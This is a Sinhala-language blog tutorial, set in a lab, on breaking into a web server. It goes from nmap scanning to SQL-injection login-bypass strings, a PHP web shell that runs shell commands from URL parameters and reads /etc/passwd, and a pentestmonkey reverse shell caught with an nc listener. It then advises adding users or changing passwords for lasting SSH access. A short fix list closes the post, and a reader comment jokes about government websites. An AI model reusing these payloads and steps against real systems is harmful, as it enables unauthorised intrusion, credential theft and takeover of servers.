NMAP වලින් හැක් කරමු

ඔව් ඉතින් පින්වතුනි අද කියන්න හදන්නේ කවුරුත් දන්නා nmap වලින් කොහොමද lan එක scan කරලා ඒකෙ සර්වර් එකකට ඇතුල් වෙන විදිහ


සෙටප් එක ගැන කිව්වෝත් මේකේ කාලි මැෂින් එකයි web for penterster කියල සර්වර් එකකුයි තියෙන්නේ

හරි මුලින්ම මන් ගන්නේ මේකට කාලි ලිනක්ස් එකක්

එකේ terminal එක open කරලා nmap කියල ගහල enter කරන්න

nmap 


එතකොට මේ වගේ හැඳින්වීමක් දෙයි ඔයාලට



දැන් ip addr කියන කමාන්ඩ් එක ගහල අපේ ලෝකල් ip එක බලමු
ip addr


හරි මේ තියෙන්නේ මගේ ලෝකල් ip එක


දැන් අපි බලමු කොහොමද lan එක scan කරන්නේ කියලා
nmap -v -sn 192.168.10.100-150


ඕක ගහල enter කරන්න


 දැන් scan වෙයි


දැන් මෙහෙම එයි



හරි ඔය උඩ තියෙන්නේ අපි scan කරපු එකේ report එක මොනාද on එකේ සහ මොනාද නැත්තේ කියල


දැන් බලමු මොනාද banner එලියට දෙන්නේ කියලා

ඒ කියන්නේ ඔය service එකක් එහෙම රන් වෙනවා නම් එකේ header එක එහෙම පෙන්නන්නේ ඒවා අල්ලන එක තමා මේ




මේ එකේ output එක



මේ තියෙන්නේ ip range එකක තියන පොර්ට් 65536 ම scan කරන කමාන්ඩ් එක
මේක තමා වටින්නේ
nmap -p- 192.168.1.100-150


මේ තියෙන්නේ එක රන් කළාම



හරි මන් දැක්ක දැන් මේකේ ssh පොර්ට් එක open එකේ තියනවා ඉතින් මන් බලනවා මොඅක්ද මේ සර්වර් එක කියලා
ssh 192.168.10.104


ඔන්න මේකේ බැනර් එකක් තියනව
මන් දන්නවා මේක දැන් මොකක් හරි වටිනා සර්වර් එකක් කියලා හැබැයි මන් මේකේ username වත් පාස්වර්ඩ් වත් දන්නේ නෑ



දැන් මන් කරන්න හදන්නේ මේකේ os එක මොකක්ද කියල බලන්න
nmap -O 192.168.10.104


ඔන්න දැන් පේනවා මේකේ විස්තර ටිකක් මොකක්ද os එක සර්විස් මොනාද mac එක මොකක්ද වගේ දේවල් ටිකක්

දැන් බලන්නේ මේකේ http නොහොත් web සර්විස් මොනාද එලියට දීලා තියෙන්නේ කියලා සහ web සර්විස් වල තියන අඩුපාඩු මොනාද කියලා
nmap --script=http-enum 192.168.10.104


මේ තියෙන්නේ තියන සර්විස් සහ ඒවගේ අඩුපාඩු



හරිනේ වැඩේ ආතල් වගේ

දැන් මන් බලනවා මොනාද මේකේ තියන සර්විස් වල version ටික කියල


nmap -sV --version-all 192.168.10.104
nmap -sV --version-intensity 5 192.168.10.104

 ඔය දෙකම පාවිච්චි කරන්න පුළුවන්



ඔයාලට පේනවා ඇති මේ සර්විස් වල version එක බලාගන්න පුළුවන්
මේකේ තියන වටිනාකම තමා මේවගේ පරණ version වල එක එක අවුල් ආව අපිට තියෙන්නේ ඒවා හොයාගෙන ගේම දෙන්න




හරිනේ දැන් මන් browser එක open කරලා මේකේ ip එක ගහනවා web එක ලෝඩ් කරන්න




දැන් පලවෙනි ලින්ක් එකට ගිහින් බලනව මොනාද කරන්න පුළුවන් කියල


හරි දැන් පොඩි sql injection එකක් දීල බලමු


  • admin' --
  • admin' #
  • admin'/*
  • ' or 1=1--
  • ' or 1=1#
  • ' or 1=1/*
  • ') or '1'='1--
  • ') or ('1'='1--

 එකක් දෙකක් ගහල බලන්න වැඩ කරයි


හරි දැන් මන් php එකක් අප්ලෝඩ් කරලා සර්වර් එකේ /etc/passwd ෆයිල් එක read කරන්න හදන්නේ
වැඩේට php ෆයිල් එකක් හදාගන්න මේ කෝඩ් එක දාල


<?php

echo system ($_GET ["val1"].' '.$_GET ["val2"] );


?>
දැන් එක අප්ලෝඩ් කරලා click කරන්න තියෙන්නේ

ඊටපස්සේ url එකේ මේක ගහන්න

http://192.168.10.104/upload/images/simple.php?val1=cat&val2=/etc/passwd

වැඩේ පොඩ්ඩක් ගලපලා ගහන්න
 හරි නම් සර්වර් එකේ පාස්වර්ඩ් file එක පෙන්නයි



දැන් බලමු shell එකක් php වලින් open කරගන්න විදිහ

මේක ගන්න php file එකකට

මේක අරන් මේකේ php-reverse-shell.php එක එඩිට් කරගන්න තමන්ගේ ip සහ පොර්ට් දාල
http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
දැන් ඔකේ අදාළ තැන් වලට ip පොර්ට් එහෙම දීලා save කරලා ඉන්න




දැන් මේ වගේ file අප්ලෝඩ් කරන්න තියන තැනකට ගිහින් අප්ලෝඩ් කරන්න




දැන් කාලි එකේ
nc -nvlp 1234

 කියල ගහල listener එකක් දාගන්න

දැන් අරක අප්ලෝඩ් කරලා රන් කරන්න

වැඩේ හරි නම් මේ වගේ shell එකක් open වෙයි ඔයාගේ machine එකේ

මේ තියෙන්නේ සර්වර් එකේ shell එක



දැන් ඔයාට permission තියනවා නම් කෙලින්ම පුළුවන් user කෙනෙක් add කරලා පාස්වර්ඩ් එකක් දාල එකෙන් ssh වලින් ලොග් වෙන්න නැත්තම් තියන ලොගින් එකක පාස්වර්ඩ් වෙනස් කරලා ssh වලින් ලොග් වෙලා ඕනි දෙයක් කරන්න



Vulnerability අවුල් තැන්

Recommendations to fix weaknesses
❖ SQL injection
• Using of Prepared Statements
• Using Parameterized Queries
• Using of Stored Procedures
• White List Input Validation
• Escaping All User Supplied Input
• Enforcing Least Privilege
• Performing White List Input Validation as a Secondary Defense
❖ File Upload Vulnerability
• Use validated file extensions.
• Limiting upload facility registered users.
• Check the file from the internet for content. Make sure it is the file type we are accepting. • Use other file hosting site to accept files (google drive, MediaFire).
• Restricting users to file storing location.
• Add some random value to file when it storing.
❖ Reverse Shells
• Install good firewall.



2 Comments

දිරියක් වෙන්න අදහස් පෙළක් දාන්න

  1. කියන්න සතුටුයි පිංවතුනි ගවර්මන්ට් වෙබ් සයිට් වලට බුදු සරණයි දෙවි පිහිටයි

    ReplyDelete
Post a Comment
Previous Post Next Post